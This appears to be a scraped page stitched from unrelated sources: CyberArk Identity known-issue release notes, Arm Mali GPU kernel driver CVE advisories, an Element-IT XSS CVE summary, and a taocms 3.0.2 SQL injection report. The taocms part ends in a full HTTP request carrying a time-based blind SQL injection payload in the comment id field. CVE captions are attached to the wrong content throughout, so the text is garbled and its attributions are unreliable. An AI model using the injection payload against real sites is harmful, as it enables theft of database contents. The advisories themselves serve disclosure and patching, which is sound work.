When users click Reload Rights in the CyberArk Identity User Portal, they receive the error You are not authorized to perform this operation. Please contact your IT helpdesk.

Users can ignore this error. It's an error with the UI; Administrative Rights reload as expected.

The UI issue will be addressed in an upcoming hotfix.

When you create a Role and add members before saving the Role, the members are not saved.

Create and save the Role, then add members to the Role and save it again.

**Windows Cloud Agent**

With RDP (v 6.0+), a user cannot RDP to the endpoint/server with the Windows Cloud Agent using a CyberArk Cloud Directoryuser. This is because the network credential validation is done on the client side first, before establishing the remote desktop connection.

https://docs.microsoft.com/en-au/troubleshoot/windows-server/remote/remote-desktop-connection-6-prompts-credentials

**Mac Cloud Agent**

The Mac Cloud Agent installer shows the Gatekeeper warning the first time it is installed on a device.

1.  Go to System Preferences > Security & Privacy > General, then click Open Anyway.
    
    ![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/GatekeeperBypass.png)
    
2.  Click Open on the warning screen that appears.
    
    After making these changes, the Gatekeeper warning will not display again for the Mac Cloud Agent on that device for the logged in user.
    

The MFA login screen shows “Phone Call” more than once if user has multiple phone numbers configured.

None

The Mac Cloud Agent cannot be updated from the UI.

WorkAround: Go to the User Portal or the Admin Portal to download the latest agent.

Reopen the Mac Cloud Agent and note the agent is updated to the latest version.

Self-service account unlock is not currently supported.

None

User may not able to see the device location.

Go to user policy Endpoint Policies > Common Settings > Mobile Settings > Restriction Settings, then under Report mobile device location select Force for Permit administrator to see device location.Then unenroll the user and enroll again.

Mac login MFA options show FIDO2 and Radius if they were configured in the authentication profile; however, these MFA challenges are currently not supported.

Always make sure authentication challenges configured in the authentication profile are available to your users and configured for each user.

The local account can get out of sync with the matching account in the directory source after the password change, resulting in a denied login.

Log in to a local admin account and set the local password of the impacted user to the same password as the directory source through System Preferences > Users or through the dscl command line.

When creating an authentication profile for Mac MFA, password must be the first factor (Challenge 1).

None

A user might get removed from the FileVault boot screen if they changed their password without entering their previous password in the Keychain Sync dialog on 10.14.3+ macOS devices.

To avoid this issue, users should log out after changing their password in the User Portal. When they log back in, click Yes at the Keychain Sync prompt and enter their previous password to sync their keychain and FileVault password.

Apple Watch unlock is not compatible with the MFA lock screen policy

Disable the MFA lock screen policy for Apple Watch users in the Admin Portal.

The CyberArk Menu Item is not removed from the UI after unenrolling until the next login or restart.

You might receive a certificate error during munkiimport after tenant migration.

Workaround: Re-enroll the Mac

The Apple Device Enrollment Program (DEP) needs to be configured explicitly to work with the 19.6 Mac Cloud Agent. Please contact support if you plan to use DEP.

None

**Mobile applications**

If the iPhone app (or the push authenticator) is locked using biometric or pin, then Apple Watch approval shows an error message.

None

Users can sign in to the Apple watch only after the first notification is delivered to the watch.

None

CVE-2022-22700: CyberArk Identity Release Notes

An Arm product family through 2022-01-03 has an Exposed Dangerous Method or Function.

**Sorry, your browser is not supported. We recommend upgrading your browser. We have done our best to make all the documentation and resources available on old versions of Internet Explorer, but vector image support and the layout may not be optimal. Technical documentation is available as a PDF Download.**

**Title**

Mali GPU Kernel Driver may elevate CPU RO pages to writable

**CVE** 

CVE-2022-22706  

**Date of issue**

6th January 2022  

**Affects**

Midgard GPU Kernel Driver: All versions from r26p0 – r31p0  
Bifrost GPU Kernel Driver: All versions from r0p0 – r35p0  
Valhall GPU Kernel Driver: All versions from r19p0 – r35p0

**Impact**

A non-privileged user can get a write access to read-only memory pages.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r36p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.  

**Credit**

n/a

**Title**

Mali  GPU Kernel Driver elevates CPU RO pages to writable

**CVE** 

CVE-2021-44828  

**Date of issue**

11th December 2021  

**Affects**

Midgard GPU Kernel Driver: All versions from r26p0 – r30p0  
Bifrost   GPU Kernel Driver: All versions from r0p0 – r34p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r34p0

**Impact**

A non-privileged user can get a write access to read-only memory, and may be able to gain root privilege, corrupt memory and modify the memory of other processes.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r35p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.  

**Credit**

n/a

**Title**

Mali  GPU Kernel Driver allows improper operations on GPU memory

**CVE** 

CVE-2021-28663  

**Date of issue**

18th March 2021  

**Affects**

Midgard GPU Kernel Driver: All versions from r4p0 – r30p0  
Bifrost   GPU Kernel Driver: All versions from r0p0 – r28p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r28p0

**Impact**

A non-privileged user can make improper operations on GPU memory to enter into a use-after-free scenario and may be able to gain root privilege, and/or disclose information.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r29p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.  

**Credit**

n/a

**Title**

Mali GPU Kernel Driver elevates CPU RO pages to writable

**CVE** 

CVE-2021-28664  

**Date of issue**

18th March 2021  

**Affects**

Midgard GPU Kernel Driver: All versions from r8p0 – r30p0  
Bifrost GPU Kernel Driver: All versions from r0p0 – r28p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r28p0

**Impact**

A non-privileged user can get a write access to read-only memory, and may be able to gain root privilege, corrupt memory and modify the memory of other processes.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r29p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.

**Credit**

n/a

**Title**

Mali GPU Kernel Driver allows improper operations on GPU memory

**CVE**

CVE-2021-29256

**Date of issue**

26th March 2021

**Affects**

Midgard GPU Kernel Driver: All versions from r28p0 – r30p0  
Bifrost GPU Kernel Driver: All versions from r16p0 – r29p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r29p0

**Impact**

A non-privileged User can make improper operations on GPU memory to gain access to already freed memory and may be able to gain root privilege, and/or disclose information.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r30p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.

**Credit**

Thanks to Brice Berna, of the Apple Media Products RedTeam for reporting this vulnerability.

CVE-2022-22706: Arm Security Updates | Mali GPU Driver Vulnerabilities – Arm Developer

A stored cross-site scripting (XSS) vulnerability in the admin interface in Element-IT HTTP Commander 7.0.0 allows unauthenticated users to get admin access by injecting a malicious script in the User-Agent field.

CVE-2022-24573: Element-IT software products news

An issue was discovered in taocms 3.0.2. This is a SQL blind injection that can obtain database data through the Comment Update field.

    POST /admin/admin.php HTTP/1.1
    Host: taocms.test
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://taocms.test/admin/admin.php?action=comment&ctrl=lists
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=q6dpqahlf85bhelm9luc2i6jp3;XDEBUG_SESSION=PHPSTORM
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 56
    
    action=comment&id=5)and(sleep(10))--+&ctrl=update&name=a

Tag

#apple